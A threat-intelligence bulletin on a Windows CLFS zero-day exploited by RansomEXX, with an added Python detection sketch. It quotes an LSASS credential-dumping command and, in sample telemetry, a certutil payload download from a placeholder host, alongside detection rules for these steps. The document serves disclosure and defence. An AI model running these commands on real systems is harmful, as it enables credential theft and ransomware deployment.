2025-04-17

Microsoft Patches Privilege Escalation Bug Used by RansomEXX in Targeted Attacks

Level: Tactical  |  Source: Microsoft
Industries: Financial, Real Estate, Retail, Technology

A newly patched Windows zero-day vulnerability, released as part of this month's April 2025 Patch Tuesday and tracked as CVE-2025-29824, was found to have been actively exploited by a ransomware group tracked by Microsoft as Storm-2460, also known as RansomEXX. The flaw exists in the Windows Common Log File System (CLFS) driver and permits local privilege escalation through a use-after-free condition. Microsoft confirmed exploitation of the vulnerability in attacks targeting "organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia." Abuse of this now-remediated flaw involved a series of post-compromise activities to elevate privileges and deploy ransomware payloads.

The initial access vector associated with the exploitation of CVE-2025-29824 remains undetermined. However, Microsoft reports that Storm-2460 behaviors observed prior to exploitation have included the use of "certutil.exe" to fetch payloads in "multiple cases." Payloads downloaded have included a malicious MSBuild file carrying an encrypted payload identified as the PipeMagic malware. Once decrypted, the malware launched the CLFS exploit through the "dllhost.exe" process. The exploit leveraged "NtQuerySystemInformation" and "RtlSetAllBits" to escalate privileges, creating a CLFS file at "C:\ProgramData\SkyPDF\PDUDrv.blf". After successful exploitation, the malware was injected into "winlogon.exe", which then launched "dllhost.exe" again to run the Sysinternals "procdump.exe" tool using the command "C:\Windows\system32\dllhost.exe -accepteula -r -ma lsass.exe c:\programdata[random letters]". This was used to dump LSASS memory and harvest credentials. Ransomware execution followed, with a ransom note named "!READ_ME_REXX2!.txt". In one case, "notepad.exe" was executed under the SYSTEM context.
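A detection sketch for the post-exploitation chain described above, added here as an example and not part of the original report or of Microsoft's guidance; the event field names (type, parent, image, cmdline, target) and the sample telemetry are assumptions:

```python
import re

# Indicators taken from the report above; field names are assumed Sysmon-style telemetry.
RANSOM_NOTE = "!read_me_rexx2!.txt"
CLFS_ARTIFACT = r"c:\programdata\skypdf\pdudrv.blf"
LSASS_DUMP_ARGS = re.compile(r"-accepteula\s+-r\s+-ma\s+lsass\.exe", re.I)
URL_IN_CMDLINE = re.compile(r"https?://", re.I)

def _base(path):
    """Lower-cased file-name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the rules an event matches (possibly none)."""
    hits = []
    if event["type"] == "process":
        image, parent = _base(event["image"]), _base(event["parent"])
        cmd = event["cmdline"]
        if image == "certutil.exe" and URL_IN_CMDLINE.search(cmd):
            hits.append("certutil_download")        # payload fetch via certutil.exe
        if LSASS_DUMP_ARGS.search(cmd):
            hits.append("lsass_dump")               # procdump-style LSASS dump
        if parent == "winlogon.exe" and image == "dllhost.exe":
            hits.append("winlogon_spawns_dllhost")  # injected winlogon launching dllhost
    elif event["type"] == "file":
        target = event["target"].lower()
        if target == CLFS_ARTIFACT:
            hits.append("clfs_exploit_artifact")
        if _base(target) == RANSOM_NOTE:
            hits.append("ransomexx_note")
    return hits

def detect(events):
    """Run every event through classify(); return [(rule, event_id), ...]."""
    return [(rule, ev["id"]) for ev in events for rule in classify(ev)]

# Constructed sample telemetry (not from the report); the last row is benign.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://example.invalid/a.proj a.proj"},
    {"id": 2, "type": "file", "target": r"C:\ProgramData\SkyPDF\PDUDrv.blf"},
    {"id": 3, "type": "process", "parent": r"C:\Windows\System32\winlogon.exe",
     "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": r"C:\Windows\system32\dllhost.exe -accepteula -r -ma lsass.exe c:\programdata\xq"},
    {"id": 4, "type": "file", "target": r"C:\Users\Public\!READ_ME_REXX2!.txt"},
    {"id": 5, "type": "process", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\dllhost.exe", "cmdline": "dllhost.exe /Processid:{x}"},
]
```

Each rule maps to one step the report describes, so a single host producing several of them in sequence is a much stronger signal than any one hit alone.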

Given this vulnerability's active exploitation, organizations are urged to patch as soon as possible. Organizations "running Windows 11, version 24H2" are outside the scope of the observed attacks, as Microsoft notes these systems "are not affected by the observed exploitation, even if the vulnerability was present."
